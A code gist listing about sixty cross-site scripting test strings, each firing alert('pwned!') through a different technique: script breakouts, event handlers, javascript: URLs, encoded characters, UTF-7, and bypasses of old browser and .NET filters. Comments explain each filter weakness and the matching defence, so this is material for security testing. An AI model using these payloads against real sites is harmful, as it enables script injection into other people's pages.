@deadbits
Last active December 12, 2015 08:49
Useful XSS techniques taken from the Cross project by thesp0nge @ http://travis-ci.org/thesp0nge/cross
# XSS test vectors, one string literal per entry. Every entry tries to reach
# alert('pwned!'), so an unencoded reflection is visible as a dialog.
# The comments below name the filter or encoder weakness each run exercises.
# Defences that cover the whole list: context-aware output encoding (HTML body,
# attribute, JavaScript string, URL), allow-list HTML sanitising rather than
# deny-list pattern matching, and a Content-Security-Policy that disallows
# inline script and inline event-handler attributes.

# --- <script> injection and context break-out ---
# Plain tag, then variants that first close an HTML comment or an open script
# block, use mixed case, or end an existing JavaScript comment/string. These
# detect filters that match one exact spelling or ignore the surrounding context.
"<script>alert('pwned!');</script>",
"/--><script>alert('pwned!');</script>",
"/--></ScRiPt><ScRiPt>alert('pwned!');</ScRiPt>",
"//;-->alert('pwned!');",
"\"//;\nalert('pwned!');",
# Malformed tag syntax: junk after a slash in the tag name, and a doubled '<'.
# A sanitiser must parse the way a browser does, not the way a regex does.
"<script/anyjunk>alert('pwned!')</script>",
"<<script>alert('pwned!');//<</script>",

# --- Event-handler attributes ---
# No <script> tag is involved, so stripping <script> alone is insufficient.
# Several entries use events or elements that were specific to legacy Internet
# Explorer (onreadystatechange on non-script elements, onpropertychange,
# onbeforeactivate, <bgsound>, <isindex>, <xml>); a sanitiser should drop every
# on* attribute instead of enumerating known handler names.
"<img onerror=alert('pwned!') src=a>",
"<xml onreadystatechange=alert('pwned!')>",
"<style onreadystatechange=alert('pwned!')>",
"<iframe onreadystatechange=alert('pwned!')>",
"<object onerror=alert('pwned!')>",
"<object type=image src=/images/live.gif onreadystatechange=alert('pwned!')></object>",
"<img type=image src=/images/live.gif onreadystatechange=alert('pwned!')>",
"<input type=image src=/images/live.gif onreadystatechange=alert('pwned!')>",
"<isindex type=image src=/images/live.gif onreadystatechange=alert('pwned!')>",
"<script onreadystatechange=alert('pwned!')>",
"<bgsound onpropertychange=alert('pwned!')>",
"<body onbeforeactivate=alert('pwned!')>",
"<body onfocusin=alert('pwned!')>",
# autofocus moves focus on load, so these handlers need no user interaction.
"<input autofocus onfocus=alert('pwned!')>",
"<input onblur=alert('pwned!') autofocus><input autofocus>",
"<body onscroll=alert('pwned!')><br><br>...<br><input autofocus>",
# Attribute placed on an end tag. Conformant HTML parsers ignore attributes on
# end tags, so this checks for non-conformant parsing in a filter or browser.
"</a onmousemove=alert('pwned!')>",
# HTML5 media elements: the load of src=1 fails and onerror runs.
"<video src=1 onerror=alert('pwned!')>",
"<audio src=1 onerror=alert('pwned!')>",

# --- javascript: URLs in URL-bearing attributes ---
# HTML-encoding the value does not help here; URL attributes (src, data, href,
# formaction, ...) need a scheme allow-list such as http/https only.
"<object data=javascript:alert('pwned!')>",
"<iframe src=javascript:alert('pwned!')>",
"<embed src=javascript:alert('pwned!')>",
"<form id=test /><button form=test formaction=javascript:alert('pwned!')>",
"<event-source src=javascript:alert('pwned!')>",

# --- Script via the style attribute (legacy Internet Explorer) ---
# behavior: and expression() executed script from CSS in old IE versions;
# user-supplied style attributes should be removed or strictly sanitised.
"<x style=behavior:url(#default#time2) onbegin=alert('pwned!')>",
"<x style=x:expression(alert('pwned!'))>",
# Unknown element name with a handler: tag-name deny-lists do not cover it.
"<x onclick=alert('pwned!') src=a>Click here</x>",

# --- Attribute delimiter variations ---
# No whitespace between attributes, backtick-quoted value, and '/' used as the
# separator after the tag name. Filters that expect "space name=value" miss these.
"<img onerror=\"alert('pwned!')\"src=a>",
"<img onerror=`alert('pwned!')`src=a>",
"<img/onerror=\"alert('pwned!')\"src=a>",

# --- Character references inside the handler value ---
# The letter 'l' of alert is written as a hex or decimal character reference,
# with varying zero padding and, in the last two, without the closing ';'.
# The browser decodes attribute values before running the handler, so a filter
# has to canonicalise (decode) input before matching keywords.
"<img onerror=a&#x6c;ert('pwned!') src=a>",
"<img onerror=a&#x06c;ert('pwned!') src=a>",
"<img onerror=a&#x006c;ert('pwned!') src=a>",
"<img onerror=a&#x0006c;ert('pwned!') src=a>",
"<img onerror=a&#108;ert('pwned!') src=a>",
"<img onerror=a&#0108;ert('pwned!') src=a>",
# NOTE(review): identical to the previous entry; possibly meant to carry one
# more leading zero, as the hex series above does. Confirm against upstream.
"<img onerror=a&#0108;ert('pwned!') src=a>",
"<img onerror=a&#108ert('pwned!') src=a>",
"<img onerror=a&#0108ert('pwned!') src=a>",

# --- Engine- and filter-specific cases ---
# NOTE(review): function::[...] looks like E4X syntax, which only older Firefox
# releases supported. Confirm before relying on this entry.
"<script>function::['alert']('pwned!')</script>",
# The next two target Chrome's XSS Auditor, which was later removed from Chrome
# altogether; browser-side XSS filters are not a substitute for server-side
# encoding.
"<svg><script>//&#x0A;alert('pwned!')</script>", #Chrome <= 18 XssAuditor bypass
"<script>/*///*/alert('pwned!');</script>", #Chrome <= 20 XssAuditor bypass
# Request-validation layers of this kind are a secondary control; output
# encoding at the point of rendering is still required.
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('pwned!'))>", #.NET RequestValidator bypass
# Only meaningful when the response is decoded as UTF-7; always send an
# explicit charset (e.g. UTF-8) in the Content-Type header.
"+ADw-script+AD4-alert('pwned!')+ADw-/script+AD4-", # UTF-7
# Closes an enclosing JavaScript object/function literal. Data written into an
# inline script needs JavaScript-context encoding, or should be passed as JSON
# or data-* attributes instead.
"},alert('pwned!'),function x(){//", # DOM breaker
# The payload reaches the page as literal \xNN escapes (the Ruby string doubles
# each backslash); the JavaScript engine decodes them before an innerHTML
# assignment. Prefer textContent, or sanitise immediately before innerHTML.
"\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('pwned!')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection